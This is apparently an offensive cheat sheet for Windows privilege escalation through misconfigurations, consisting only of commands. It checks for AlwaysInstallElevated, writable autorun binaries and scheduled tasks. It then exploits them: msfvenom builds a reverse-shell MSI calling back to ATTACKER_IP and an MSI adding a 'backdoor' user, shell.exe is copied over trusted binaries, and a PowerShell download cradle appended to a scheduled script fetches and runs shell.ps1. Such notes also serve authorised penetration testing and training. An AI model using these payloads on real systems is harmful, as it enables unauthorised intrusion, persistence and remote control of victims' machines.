Misconfigurations

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

. .\PowerUp.ps1
Get-RegistryAlwaysInstallElevated

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f msi -o shell.msi

msiexec /quiet /qn /i shell.msi

msfvenom -p windows/adduser USER=backdoor PASS=P@ssw0rd123! -f msi -o adduser.msi

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Get-CimInstance Win32_StartupCommand | Select Name, Command, Location

icacls "C:\Path\to\autorun.exe"

accesschk.exe /accepteula -wvu "C:\Path\to\autorun.exe"

copy shell.exe "C:\Path\to\autorun.exe"

schtasks /query /fo LIST /v

Get-ScheduledTask | Where-Object { $_.State -eq "Ready" } | ForEach-Object {
    $_ | Select TaskName, @{N="Action";E={$_.Actions.Execute}}, @{N="RunAs";E={$_.Principal.UserId}}
}

Get-ScheduledTask | ForEach-Object {
    $info = $_ | Get-ScheduledTaskInfo -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        Name   = $_.TaskName
        Action = $_.Actions.Execute
        RunAs  = $_.Principal.UserId
    }
} | Where-Object { $_.RunAs -match "SYSTEM|Administrator" }

icacls "C:\Path\to\scheduled_script.ps1"

# Append reverse shell to existing script
Add-Content "C:\Path\to\scheduled_script.ps1" "`nIEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')"

copy shell.exe "C:\Path\to\scheduled_binary.exe"

icacls "C:\Path\to\task_folder\"